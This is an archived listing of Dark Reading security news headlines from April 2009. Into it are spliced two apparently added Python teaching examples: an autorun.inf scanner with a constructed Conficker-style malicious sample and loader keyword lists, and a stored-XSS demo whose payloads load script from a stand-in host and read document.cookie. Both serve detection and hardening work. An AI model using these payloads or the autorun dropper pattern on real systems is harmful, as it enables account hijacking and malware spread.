Dark Reading is part of the Informa Tech Division of Informa PLC


News & Commentary

Content posted in April 2009
<<   <   Page 2 / 3   >   >>
Secunia Pushes For Standard That Updates Consumer Apps
News  |  4/21/2009  | 
Danish security firm asks software vendors to help build common application that handles all third-party application updates and patching
Symantec Beefs Up Its SMB Security Line
Commentary  |  4/21/2009  | 
Symantec used this week's RSA conference to roll out a pair of new security products aimed at small and midsize companies. The Symantec Protection Suite combines endpoint and messaging protection with data recovery to create a layered approach to security, while the Symantec Endpoint Protection Small Business Edition is designed to make SMB security easy to install and manage.
RSA Offers Encryption Toolkit Free To Developers
News  |  4/20/2009  | 
New Share Project program will help build security into software from the ground up
Cisco Launches Security Services For Cloud Computing, Collaboration
News  |  4/20/2009  | 
New services will also help enterprises manage cloud security
The Human Element Behind Malware-Related Breaches
Commentary  |  4/20/2009  | 
Last year, the Verizon Data Breach Investigation Report made a big splash with insightful statistics on actual data breach investigations performed by the company's incident response team. Last week, the team released an updated version (PDF) for 2009 that includes more data, as well as an interesting look at what happened during the past year. What's grabbing my attention? The numbers related to malwa
Oracle's Acquisition of Sun Changes Identity Management Landscape
Commentary  |  4/20/2009  | 
Oracle's stealing Sun at the altar of a possible marriage with IBM not only saves Oracle from a long-standing partnership going stale, but also significantly bolsters Oracle's security capabilities.
I'm Interested, But In You
Commentary  |  4/20/2009  | 
Social engineering is a disturbing aspect of overall security threat analysis because it is the human element that is least in our control. Security and psychology -- once again -- go hand in hand.
Apps Bypassing Business Security -- Bigtime!
Commentary  |  4/20/2009  | 
Those applications your employees use (whether you want them to or not) are making it easier for them to bypass security systems and controls. A new report from firewall company Palo Alto Networks shows just how easy -- and just how serious the problem is.
Companies Still Falling Short On Security Training, Study Says
Quick Hits  |  4/20/2009  | 
Nearly half of security professionals say their company cultures are "unsupportive" of security
Botnets: Coming To A Social Network Near You
Commentary  |  4/17/2009  | 
I've dealt with a lot of different types of bots. The communication channels among them have varied from unsophisticated IRC command and control (C&C) servers to advanced peer-to-peer (P2P) protocols. For botnet herders, the challenge is flying under the radar of network security professionals who are monitoring their networks and looking for anomalies. The infosec pros who know their networks inside and out are likely to pick up on strange protocols pretty quickly -- which is one of the reasons
SSD And The Infrastructure
Commentary  |  4/17/2009  | 
In a recent blog on InformationWeek's sister site Internet Evolution, David Vellante's "Flash Drives Set to Give Internet a Performance Boost" suggests that fibre drives might be replaced by flash drives within the next three years. In our presentation last year on "The State of SSD" we made a similar prediction. Since David and I agr
Jericho Forum Issues Best Practices For Secure Cloud Computing
News  |  4/17/2009  | 
"Cloud Cube" model provides criteria for evaluating online services model, provisioning
Unauthorized Apps Often Go Unseen And Unchecked, Study Says
Quick Hits  |  4/17/2009  | 
Despite policies, most corporate networks remain rife with P2P, Google tools, and other unsanctioned apps, study says
Netgear Unified Threat Management Appliances Aimed At Small Business Gateways
Commentary  |  4/17/2009  | 
Netgear's just-announced ProSecure Unified Threat Management (UTM) appliances aim to identify threats in the cloud, block them at the gateway, and do so at prices aggressively aimed at small business budgets, even in tight economic times.
RSA: Microsoft Pushes 'Geneva' In War On Passwords
News  |  4/16/2009  | 
Formerly known as Zermatt, the claims-based access platform is a framework for granting people access to information.
Insecurity The Price Of Ubiquity
Commentary  |  4/16/2009  | 
The mainstream media seems enamored by the ubiquitous Internet, but it's not doing much to reveal the risks of interconnected computers.
OTA Fails Several Government Agencies, Retailers For Poor Online Security
Quick Hits  |  4/16/2009  | 
The Online Trust Alliance calls out the DHS, FBI, White House, and others for not using email authentication on their Websites
Microsoft Partners With Network Security Vendors For 'Stirling'
News  |  4/16/2009  | 
Microsoft releases new beta version of next-gen security suite, announces first Forefront security service
Samsung Offers Self-Encrypting SSDs
News  |  4/16/2009  | 
Dell says it plans to offer the drives in laptops in the coming months.
Spam Is Killing The Planet
News  |  4/16/2009  | 
McAfee says that the energy required to send, route, and filter spam e-mail each year could power 2.4 million homes and release as much greenhouse gas as 3.1 million cars.
Data Breaches WAY Up In 2008; 90% Of Them Easily Preventable
Commentary  |  4/16/2009  | 
According to a new Verizon study, 2008 saw more instances of data breaches than the preceding four years combined. And considering how easily most of those breaches could be prevented -- but weren't -- my guess is that 2008 won't hold the record for long.
Report: 2008 Saw More Records Breached Than The Previous Four Years Combined
Quick Hits  |  4/15/2009  | 
Most compromises could have been avoided, Verizon study says
Open Source Metrics On Tap For Security Patch Management
News  |  4/15/2009  | 
Securosis, Microsoft team up to solicit input for building a metrics model that measures efficiency and costs of security patching
The Certainty Of Death, Taxes and Malware
Commentary  |  4/15/2009  | 
In a letter to Jean-Baptiste Leroy, Benjamin Franklin spoke of the seemingly permanent outlook for the new Constitution, and followed up with "but in this world nothing can be said to be certain, except death and taxes." I don't think we can disagree about any of those points, especially with today being when the tax man cometh. However, I think we can add something else to that quote about certainty: malware.
With More Urgency Than Usual, Apply This Month's Batch of Microsoft Patches
Commentary  |  4/14/2009  | 
Exploits are already out in the wild for a number of the vulnerabilities patched just today.
More Data Breached In 2008 Than In Previous Four Years Combined
News  |  4/14/2009  | 
Surprisingly, 99% of breached records were accessed through servers and applications, rather than desktop computers, notebooks, mobile phones, or portable media.
Study: Despite Increased Security Spending, Severity Of Breaches Is On The Increase
News  |  4/14/2009  | 
CompTIA study says human error is the most frequent cause of breaches worldwide
Chinese National Arrested For Source Code Theft
News  |  4/14/2009  | 
The information was taken from a New Jersey company that develops, implements, and supports software for environmental applications.
Attack Sneaks Rootkits Into Linux Kernel
News  |  4/14/2009  | 
A researcher at Black Hat Europe this week will demonstrate a more stealthy way to hack Linux
Microsoft Issues Eight Security Bulletins For April Patch Day
News  |  4/14/2009  | 
The fixes repair an Excel flaw that Microsoft warned about in February, as well as an Internet Information Services and SQL Server vulnerability.
Over 60% Of Breaches Tied To Flaws In Business-Critical Applications
Quick Hits  |  4/14/2009  | 
Survey by Forrester Consulting and Veracode shows businesses struggling to stay on top of application security
Got Any Good Disaster Stories? Got Any Good (Or Better!) Recovery Stories?
Commentary  |  4/14/2009  | 
Disaster strikes! And businesses that are prepared spring into Recovery Mode, missing as few business beats as possible. How prepared is your business for disaster? (More importantly, how prepared are you for recovery?) And have you ever had to test your planning for real? bMighty wants to know.
EU Says UK Privacy Laws Lacking
News  |  4/14/2009  | 
European watchdogs say Britain needs to impose stricter controls on targeted Internet advertising.
Primary Storage Optimization Compromises
Commentary  |  4/13/2009  | 
Primary file system storage optimization, i.e. squeezing more data into the same space, continues to grow in popularity. The challenge is that the deduplication of primary storage is not without its rules. You can't dedupe this, you can dedupe that, and you have to be cognizant of the performance impact on a deduplicated volume.
Get Ready To Patch
Commentary  |  4/13/2009  | 
Organizations need to prep for a pretty significant set of patches scheduled to roll out from Redmond tomorrow. It's the largest batch of security updates from Microsoft in nearly six months.
RSA Integrates Data Leak Prevention With Security Information Management
Quick Hits  |  4/13/2009  | 
DLP 7.0 will interact with enVision SIEM tool, allowing IT to identify insider events
New Web Vulnerability Tool Is Passive But Aggressive
Commentary  |  4/13/2009  | 
Every couple of weeks, a project comes across my desk that requires some sort of Web application vulnerability assessment or penetration test. It's one of the more fun things I get to do, and I rely on quite a few different tools during each engagement. While most people relatively unfamiliar with Web app security think of active scanning apps such as Cenzic and WebInspect when they think Web app testing, quite a few of the tools I use fall into the passive analysis category.
Conficker Worm Hits University Of Utah
News  |  4/13/2009  | 
Conficker copies itself to removable drives along with an autorun.inf crafted so that Windows AutoRun launches the copy whenever the drive is inserted into a computer system.
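The removable-media vector in the item above lives entirely in a small INI file, so it is worth seeing what an autorun.inf inspector has to cope with: keys in scrambled case (INI parsing is case-insensitive, so Windows does not care), junk bytes padded around the real entries, a payload executed via a trusted loader from a directory such as RECYCLER, and an "Action" string that copies Explorer's own "Open folder to view files" menu entry so the user picks the malware by accident. The script below is an added example written for this page, not code from the article or from any vendor tool; the malicious autorun.inf it scans is constructed to exercise those tricks and is not a real worm artefact.

```python
"""Flag autorun.inf files that would hand execution to a dropped binary on insertion.

Added example, not from the original article. The malicious sample is constructed
(not a real worm file) to show the tricks an inspector must tolerate.
"""
import re

# Keys that make Windows AutoRun/AutoPlay launch something when the drive is inserted.
EXEC_KEYS = {"open", "shellexecute"}
# Loaders commonly used to hide the real payload behind a trusted Windows binary.
SUSPICIOUS_LOADERS = ("rundll32", "regsvr32", "cmd.exe", "wscript", "cscript", "mshta")
# Directories a legitimate autorun has no business executing from.
SUSPICIOUS_PATHS = ("recycler", "$recycle.bin", "system volume information")
# Text Explorer shows for a plain folder; an autorun that reuses it is impersonating it.
EXPLORER_DEFAULT_ACTION = "open folder to view files"

KEY_RE = re.compile(rb"^\s*([A-Za-z]+)\s*=\s*(.*?)\s*$")


def parse_autorun(raw: bytes) -> dict:
    """Return {lowercased key: value} for the [autorun] section.

    Junk bytes are tolerated: lines that do not look like key=value are dropped,
    and keys are lower-cased because 'shelLExEcuTE' means 'shellexecute' to Windows.
    """
    entries = {}
    in_section = False
    for line in raw.splitlines():
        stripped = line.strip()
        if stripped.lower() == b"[autorun]":
            in_section = True
            continue
        if stripped.startswith(b"[") and stripped.endswith(b"]"):
            in_section = False
            continue
        if not in_section:
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).decode("ascii", "ignore").lower()
            entries[key] = m.group(2).decode("latin-1", "ignore")
    return entries


def assess_autorun(raw: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    entries = parse_autorun(raw)
    findings = []
    for key in sorted(entries.keys() & EXEC_KEYS):
        value = entries[key]
        lowered = value.lower()
        findings.append(f"{key}= launches '{value}' on insertion")
        if any(loader in lowered for loader in SUSPICIOUS_LOADERS):
            findings.append(f"{key}= uses a script/DLL loader to run the payload")
        if any(path in lowered for path in SUSPICIOUS_PATHS):
            findings.append(f"{key}= executes from a directory that should never hold programs")
    if EXPLORER_DEFAULT_ACTION in entries.get("action", "").lower():
        findings.append("action= impersonates Explorer's default 'Open folder' option")
    if entries.get("icon", "").lower().startswith("%systemroot%\\system32\\shell32.dll"):
        findings.append("icon= borrows the stock folder icon from shell32.dll")
    junk = sum(
        1 for line in raw.splitlines()
        if line.strip() and not KEY_RE.match(line) and not line.strip().startswith(b"[")
    )
    if junk:
        findings.append(f"{junk} non-INI junk line(s) present (padding used to confuse scanners)")
    return findings


# Constructed malicious sample: junk padding, mangled case, loader + RECYCLER path, fake menu entry.
SAMPLE_MALICIOUS = (
    b"\x03\x9f\xc2junk\x00\x00\n"
    b"[AuToRuN]\n"
    b"\x7f\xffmore padding\n"
    b"AcTiOn=Open folder to view files\n"
    b"IcOn=%systemroot%\\system32\\shell32.dll,4\n"
    b"shelLExEcuTE=RuNdlL32.eXE .\\RECYCLER\\S-5-3-42-2819952290\\payload.vmx,ahaezedrn\n"
    b"UseAutoPlay=1\n"
)
# Constructed benign sample: a driver disc that only sets a label and an icon.
SAMPLE_BENIGN = b"[autorun]\nlabel=Driver Disc\nicon=setup.ico\n"

if __name__ == "__main__":
    for name, raw in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, "->", assess_autorun(raw) or ["clean"])
```

Run it against the root of a mounted removable drive's autorun.inf (read the file in binary mode, since the padding is not text). The case-folding and junk-tolerant parsing matter more than the keyword list: a scanner that reads the file as clean UTF-8 or compares keys case-sensitively misses exactly the samples that were built to evade it.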
IE 7 and 8 Default Security Leaves Intranets At Risk
News  |  4/13/2009  | 
Researcher details attacks on intranets that abuse Internet Explorer 7 and 8 security default settings
Twitter Worm Strikes; Teen Worm Creator Feels Pretty Bad About It
Commentary  |  4/13/2009  | 
This weekend's Twitter worm(s) problem is turning into this week's Twitter worm(s) problem, and is a reminder that as social networks come of age so do social net risks. Good thing the kid who created the worms feels bad about it.
Twitter Visited By Worms Instead Of Bunnies
News  |  4/13/2009  | 
An exploit of a cross-site scripting flaw in Twitter sent almost 10,000 spam tweets and compromised at least 190 accounts over the weekend.
Worm Hits Twitter Over Easter Weekend
Commentary  |  4/13/2009  | 
A multi-day attack infected numerous user accounts on the popular micro-blogging platform. Reports say malicious code is still active.
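The two Twitter items above describe a worm propagating through a stored cross-site scripting flaw: script saved into a user's profile ran in the browser of everyone who viewed that profile and re-posted itself. The snippet below is an added example for this page, not Twitter's code and not the worm itself; it assumes a profile with a free-text name and a website URL (the field names are illustrative) and shows the vulnerable rendering next to a hardened one. The two constructed payloads cover the classic attribute break-out and the javascript: URL that survives HTML escaping alone.

```python
"""Stored XSS through a profile field: the vulnerable rendering next to the fixed one.

Added example; not Twitter's code and not the worm. Field names and payloads are
constructed for illustration.
"""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def render_profile_vulnerable(name: str, website: str) -> str:
    """Raw interpolation into HTML: whatever one user saved becomes markup that
    executes in every visitor's browser, which is the worm's propagation path."""
    return f'<div class="profile"><h2>{name}</h2><a href="{website}">{website}</a></div>'


def safe_url(website: str) -> str:
    """Allow only absolute http(s) URLs. javascript:, data:, vbscript: and
    scheme-less tricks are dropped, because escaping cannot defuse them inside href."""
    candidate = website.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return ""
    return candidate


def render_profile_safe(name: str, website: str) -> str:
    """Encode for the context each value lands in: HTML text for the name,
    HTML attribute (quote=True escapes both quote characters) for the URL,
    plus the scheme allowlist above."""
    safe_name = html.escape(name, quote=True)
    url = safe_url(website)
    if not url:
        return f'<div class="profile"><h2>{safe_name}</h2></div>'
    url_attr = html.escape(url, quote=True)
    return f'<div class="profile"><h2>{safe_name}</h2><a href="{url_attr}">{url_attr}</a></div>'


def contains_active_content(markup: str) -> bool:
    """Crude check used only to contrast the two renderers: a <script> tag or a
    javascript: href means the profile page executes attacker-chosen code."""
    lowered = markup.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


# Constructed payloads modelled on the two common profile-field vectors.
BREAKOUT = 'http://example.invalid/"><script src="http://example.invalid/w.js"></script><a href="'
JS_SCHEME = "javascript:alert(document.cookie)"

if __name__ == "__main__":
    for payload in (BREAKOUT, JS_SCHEME):
        print("vulnerable executes:", contains_active_content(render_profile_vulnerable("bob", payload)))
        print("hardened executes:  ", contains_active_content(render_profile_safe("bob", payload)))
```

Note that the BREAKOUT payload passes the scheme allowlist (it really does start with http://), so it is the attribute-context escaping that neutralises it, while the JS_SCHEME payload is perfectly escaped HTML and is stopped only by the allowlist. Both controls are needed; either one alone leaves a hole.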
Black Hat Europe: Interesting InfoSec Research Ahead (Be Afraid)
Commentary  |  4/11/2009  | 
I always enjoy the Black Hat sessions. The conference leans much more on the technical side of things, more so than the humongous brochure-fest known as RSA. Black Hat Europe is next week, April 14th through 17th. And while I (unfortunately) won't be able to attend, there are a number of sessions I wouldn't miss if I were able to hop a flight to Amsterdam.
Researcher To Demonstrate Flaws In Wireless Warehouse Networks
Quick Hits  |  4/10/2009  | 
Trustwave pen tester says 802.11 FHSS networks aren't as safe as many companies think
Webcam Captures Burglars
Commentary  |  4/10/2009  | 
The Internet gets plenty of blame for facilitating crimes, but it deserves at least as much credit for solving them. Consider the case of 43-year-old Jeanne Thomas of Boynton Beach, Florida, who was at work in Fort Lauderdale on Wednesday, watching her home through a live video feed from a desktop Webcam, when she saw two intruders enter her house.
Tech Insight: Making The Most Of Open-Source Forensics Tools
News  |  4/10/2009  | 
Emerging offerings can turn network forensics into a low-cost, do-it-yourself security project
Optimize Cloud Storage, Flash Storage And Deduplication
Commentary  |  4/10/2009  | 
In our last entry we discussed the growing importance of efficiency. Tools and better storage systems can help make IT Administrators more efficient. The other option is to keep throwing new technology at the problem. Cloud Storage, Flash Storage and Deduplication are great examples.
Microsoft Plans Eight Security Fixes Next Week
News  |  4/9/2009  | 
Five of the Patch Tuesday fixes affect Windows, one affects Internet Explorer, one affects Excel, and one affects ISA Server.
Many Enterprises Still Don't Recognize Insider Threat, Studies Say
News  |  4/9/2009  | 
Small businesses are chief laggards in deploying data leakage protection technology, researchers say
Fujitsu Consulting Reveals Breach Involving Travelers, Other IT Clients
Quick Hits  |  4/9/2009  | 
Personal information of more than 3,000 may have been lost along with storage device containing data on Fujitsu IT client projects

